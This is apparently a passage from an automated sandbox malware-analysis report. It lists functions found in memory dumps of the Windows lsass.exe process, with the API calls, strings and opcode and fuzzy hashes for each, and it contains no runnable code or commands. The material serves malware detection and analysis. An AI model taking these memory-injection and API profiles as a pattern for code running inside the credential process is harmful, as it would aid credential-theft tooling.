                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                                • String ID: api-ms-
                                                                                                                                                                                                                                                • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                                • Opcode ID: 1bda5a7f51937e5fba9747c90859e34dfa5f89533a2a1b8d1dea998784ab284d
                                                                                                                                                                                                                                                • Instruction ID: 687ad33320da4c6a2d702a3c851c8e0a789a4fc93b2b137df9a9527406f721b1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1bda5a7f51937e5fba9747c90859e34dfa5f89533a2a1b8d1dea998784ab284d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6931E13134EF58A1EE519B42B801BD523B4BF49BA0F5D26259D1D0B392EF79D4CA8340
                                                                                                                                                                                                                                                Function 0000017D2DD64324 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                                • String ID: CONOUT$
                                                                                                                                                                                                                                                • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                                • Opcode ID: 4c50c600c840af11fb29c95c0db3c2be4712be37c9ecc349f2f252041d9feab2
                                                                                                                                                                                                                                                • Instruction ID: b286c26bad5599ec3e4dce0df1cbee38a854a1552613a0a24c44eaeb964dc17e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4c50c600c840af11fb29c95c0db3c2be4712be37c9ecc349f2f252041d9feab2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 63116031718F8886E7508B56F94439966B0FB88FE4F084224EE5E8779ACF3CC48687C0
                                                                                                                                                                                                                                                Function 0000017D2DD537A4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                                                                                                                                                                                • String ID: wr
                                                                                                                                                                                                                                                • API String ID: 1092925422-2678910430
                                                                                                                                                                                                                                                • Opcode ID: d02d62af4a13f9151a1d64f675f2e823d7ed1e1e396348dfe74f8be14938124b
                                                                                                                                                                                                                                                • Instruction ID: a133de99f9e09dc66d4cec223420a026b9debbf19d123a2964e23df4e8ddc47c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d02d62af4a13f9151a1d64f675f2e823d7ed1e1e396348dfe74f8be14938124b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 34115E3A708B4583EF249B52F4042A966B0FB89B95F080069DE9D07B56EF3DC586C744
                                                                                                                                                                                                                                                Function 0000017D2DD55B40 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Thread$Current$Context
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1666949209-0
                                                                                                                                                                                                                                                • Opcode ID: 2460c92bfe80c12f43b9e41940236e3d31cb2b1f5e55ffad558bfd096889bb43
                                                                                                                                                                                                                                                • Instruction ID: 5852f0580ab69e97f1a52fd2e322d2a7f92818f85b2362e8f5bcff1b012e8ad0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2460c92bfe80c12f43b9e41940236e3d31cb2b1f5e55ffad558bfd096889bb43
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 61D18B76209F8881EA71DF16F49439A77B0F788B84F145216EA8D4776ADF78C592CB00
                                                                                                                                                                                                                                                Function 0000017D2DD514A4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 83memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Heap$Process$Free
                                                                                                                                                                                                                                                • String ID: C:\Windows\system32\lsass.exe
                                                                                                                                                                                                                                                • API String ID: 3168794593-3553486595
                                                                                                                                                                                                                                                • Opcode ID: 8f6c8013f26ca493c8b85487be1e8632cd5ea831c810228ac57a4b2b7c934696
                                                                                                                                                                                                                                                • Instruction ID: 6100b6c19792221e5ab68393cc76ae802cdc86c35694ed7f9ff5f1585bdaadd1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8f6c8013f26ca493c8b85487be1e8632cd5ea831c810228ac57a4b2b7c934696
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E9316FBB54DFC88AE3518F66B8552893FB0FB89F40F0D8096DB4843247EA299486C7C0
                                                                                                                                                                                                                                                Function 0000017D2DD5D510 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2506987500-0
                                                                                                                                                                                                                                                • Opcode ID: 5a5575a5d1708c946e79aad68248bc2e3b8df018e302dfb520b8908bc7679156
                                                                                                                                                                                                                                                • Instruction ID: 89a0addc245c739b2e1241a26f07f7771b3cddb85ef77f011d7e29de442e1be8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5a5575a5d1708c946e79aad68248bc2e3b8df018e302dfb520b8908bc7679156
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3C114A3020DF4882FE54A73175513A92272AF497A4F5C0724E97F4A7DBDEE8D4838260
                                                                                                                                                                                                                                                Function 0000017D2DD519A4 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 517849248-0
                                                                                                                                                                                                                                                • Opcode ID: 8727d58878f2a869f14b8fd26c384ee344685f44cd71b3c6aa4d19fd6db2488a
                                                                                                                                                                                                                                                • Instruction ID: 103a84cc079cad328c3536a9994b729114022c249ba88867120555d5bc1d5874
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8727d58878f2a869f14b8fd26c384ee344685f44cd71b3c6aa4d19fd6db2488a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7D013535308B8886EA20DB12B85839963B1FB88BC0F884074DE5D43756DE3CC98A8780
                                                                                                                                                                                                                                                Function 0000017D2DD536DC Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 449555515-0
                                                                                                                                                                                                                                                • Opcode ID: 6a4903f23145d629ccf7c0814750504573150cedf00e013b6ac3f495348c8662
                                                                                                                                                                                                                                                • Instruction ID: 45d3aafdb8d7983e479a19dca995c96b276e104aef41bcde3e98c265d121dafb
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6a4903f23145d629ccf7c0814750504573150cedf00e013b6ac3f495348c8662
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5F012D79619F8982FB249B21F81839976B0FF49B86F084164C94D07366EF3DC5968780
                                                                                                                                                                                                                                                Function 0000017D2DD5C208 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                • Opcode ID: 0e03656a98ecf47c8c70bd094229c94189d23a90474f93e2876379b06086d007
                                                                                                                                                                                                                                                • Instruction ID: 67b5377c4882bdd2fb480e4c15f4ea076b6d168c4ac18011086163db52505644
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0e03656a98ecf47c8c70bd094229c94189d23a90474f93e2876379b06086d007
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4AF04F75219F4C91EB108B68F4447996370AF89B61F5C0619D66E455E6CF2CC0CA83C0
                                                                                                                                                                                                                                                Function 0000017D2DD53058 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CombinePath
                                                                                                                                                                                                                                                • String ID: \\.\pipe\
                                                                                                                                                                                                                                                • API String ID: 3422762182-91387939
                                                                                                                                                                                                                                                • Opcode ID: 230e05f875843765b10c94681cacd2039b66fa3fae77185737d73b0c30566c8e
                                                                                                                                                                                                                                                • Instruction ID: a71ca98afc5d1a3faeee4372e4a7ee3782857345fd784a6b70abb11282a46d7d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 230e05f875843765b10c94681cacd2039b66fa3fae77185737d73b0c30566c8e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D4F0F878618FD892EA148F17B914199A675AF48FD0F4C9160EE8E47B6ADE28C4C68780
                                                                                                                                                                                                                                                Function 0000017D2DD550E0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentThread
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2882836952-0
                                                                                                                                                                                                                                                • Opcode ID: d320431a3885b97cf1102f80532d88567ca490bad17f23be6033182695dcdf12
                                                                                                                                                                                                                                                • Instruction ID: e6d87f0c609476c9c3fe7a6a5eb031aa0c38f023ad504c3198547cd31559fcd5
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d320431a3885b97cf1102f80532d88567ca490bad17f23be6033182695dcdf12
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D802D53221DB8886EB61CF59F49079AB7B0F785790F144115EA8E87BA9DFBCD485CB00
                                                                                                                                                                                                                                                Function 0000017D2DD55720 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentThread
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2882836952-0
                                                                                                                                                                                                                                                • Opcode ID: 58d07a547137d2bff2769a738302b31e3611db479abe89d2490128d207b61db9
                                                                                                                                                                                                                                                • Instruction ID: b95a49320f5f936f0cbfd1ad766bc8001534a62ea65b0c2045d606bdb59b6b9b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 58d07a547137d2bff2769a738302b31e3611db479abe89d2490128d207b61db9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2061C63651CB88C6E7618F15F45439AB7B0F788784F581255EA8D47BAADBBCC582CF00
                                                                                                                                                                                                                                                Function 0000017D2DD33A74 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000009.00000002.2672695610.0000017D2DD20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD20000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_17d2dd20000_lsass.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _set_statfp
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1156100317-0
                                                                                                                                                                                                                                                • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                                                                                                                • Instruction ID: c84d9aacd1d8addd50e5f2eacee9ba06884b6ff10871cfc468d780551510e725
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 40117737A5CF9903F6F42168FA563E511706FD9374F0D0624A5AE076EBDA68C9C34A00
                                                                                                                                                                                                                                                Function 0000017D2DD64674 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _set_statfp
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1156100317-0
                                                                                                                                                                                                                                                • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                                                                                                                • Instruction ID: f6ebd2a08155cb11d01359cfb63a2bca7832278ab15c1ba96f775ce0276b74ad
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8C118236A1CF5902F69421A8F5463EA15716F59378F0C0624EBBF066EFCA28A8C346C0
                                                                                                                                                                                                                                                Function 0000017D2DD58C20 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorLast
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1452528299-0
                                                                                                                                                                                                                                                • Opcode ID: 262bc654722f382832ee849732648380985e09d24724c89ec07dab82b46ccafe
                                                                                                                                                                                                                                                • Instruction ID: fb1fb065e3761e1735645901ad562fda475c9c7d98b9c26518c4587266ea644e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 262bc654722f382832ee849732648380985e09d24724c89ec07dab82b46ccafe
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6611213065EF9841FA649725BC407E922B16F847E0F1C5B65992E077DBDE68D8C38640
                                                                                                                                                                                                                                                Function 0000017D2DD58580 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                                • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                                                • Opcode ID: 34f41f65ebeee98072c04c36ffcb08d764f10b3598a8f5a66480d6cdd8a7e9c2
                                                                                                                                                                                                                                                • Instruction ID: 9703ed410a9340cc908e4931cf78f7e29496ba7c3cf6789e4f5c51a701e75255
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 34f41f65ebeee98072c04c36ffcb08d764f10b3598a8f5a66480d6cdd8a7e9c2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DC51D132359B098ADB54CF15F444BAC73B2FB44B88F588124EA5E4378ADBB9D8C2C700
                                                                                                                                                                                                                                                Function 0000017D2DD5AFC0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                                • String ID: MOC$RCC
                                                                                                                                                                                                                                                • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                                • Opcode ID: 8ebe29515744ec85b4c7a5c69406529571aeda380531785c74bea0d93e5ddae6
                                                                                                                                                                                                                                                • Instruction ID: 37d8c610e4af2e6b97041494e605923acf12223c33339c91c8d6a38ae5c6032d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8ebe29515744ec85b4c7a5c69406529571aeda380531785c74bea0d93e5ddae6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 41615C72508BC885E7609F15F4407DAB7B0FB85B98F084215EB9D07B9ADBB8D1D5CB00
                                                                                                                                                                                                                                                Function 0000017D2DD2A770 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000009.00000002.2672695610.0000017D2DD20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD20000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_17d2dd20000_lsass.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                                • String ID: csm$csm
                                                                                                                                                                                                                                                • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                                • Opcode ID: 54601b73b573f90b6a3621b815e414a07fc66bdc2a6778d7d0011f6600b73964
                                                                                                                                                                                                                                                • Instruction ID: 3a2f33974cbffdbc27016b30a0180f43e39ef5857859974130326578c4fd82b9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 54601b73b573f90b6a3621b815e414a07fc66bdc2a6778d7d0011f6600b73964
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E351713210CB888AFB648F16A548398B7B0FB54B94F5C5115DA8D47BDBCB38D4D2CB45
                                                                                                                                                                                                                                                Function 0000017D2DD5B370 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                                • String ID: csm$csm
                                                                                                                                                                                                                                                • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                                • Opcode ID: 54601b73b573f90b6a3621b815e414a07fc66bdc2a6778d7d0011f6600b73964
                                                                                                                                                                                                                                                • Instruction ID: 7c6e6b287cefa42d2b4f20f59e5748d3ba937cd9ba642ee52733f0753b695d25
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 54601b73b573f90b6a3621b815e414a07fc66bdc2a6778d7d0011f6600b73964
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9751A1B2108B88CAEB788F15A44439877B0FB54B98F5D4115EA8D47BD7CBB8D4D2CB00
                                                                                                                                                                                                                                                Function 0000017D2DD52F18 Relevance: 6.3, APIs: 5, Instructions: 93memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Heap$Process$AllocFree
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 756756679-0
                                                                                                                                                                                                                                                • Opcode ID: 787e2ccd3a4a2f0807cc7fcfab9808ef1bc99af934d1353d068844bd3f29b985
                                                                                                                                                                                                                                                • Instruction ID: 54f9e5e9d44ab499b75b5659f2a4b467d5f91330215d6b7b2f458f4dfb7fba1c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 787e2ccd3a4a2f0807cc7fcfab9808ef1bc99af934d1353d068844bd3f29b985
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 84314C36709F5982EA54DF1AF9447A967B0BF44B80F0C8120AF4C47B56EB78D4AB8740
                                                                                                                                                                                                                                                Function 0000017D2DD625C8 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2718003287-0
                                                                                                                                                                                                                                                • Opcode ID: ef5328ec8df5305a5bebb05340c2e4b6dc17e77d604934f64985ec379b581ae8
                                                                                                                                                                                                                                                • Instruction ID: 20055ba21df562614c06cc987502ba0b446227129318bac7390367b70cdc54a4
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ef5328ec8df5305a5bebb05340c2e4b6dc17e77d604934f64985ec379b581ae8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E5D1A232719B8899E721CF69E4403EC3BB1FB54798F588216DE5D97B9ADA34C487C380
                                                                                                                                                                                                                                                Function 0000017D2DD62EF0 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 953036326-0
                                                                                                                                                                                                                                                • Opcode ID: 43d1806d22cf26bb578584b1f50928cd79f72239213f1d2f409b9d03dcc02cf4
                                                                                                                                                                                                                                                • Instruction ID: be3d7da99a44cf06035a3b661a4036c74b4374953cba13c1359ed8f0bc95d2a8
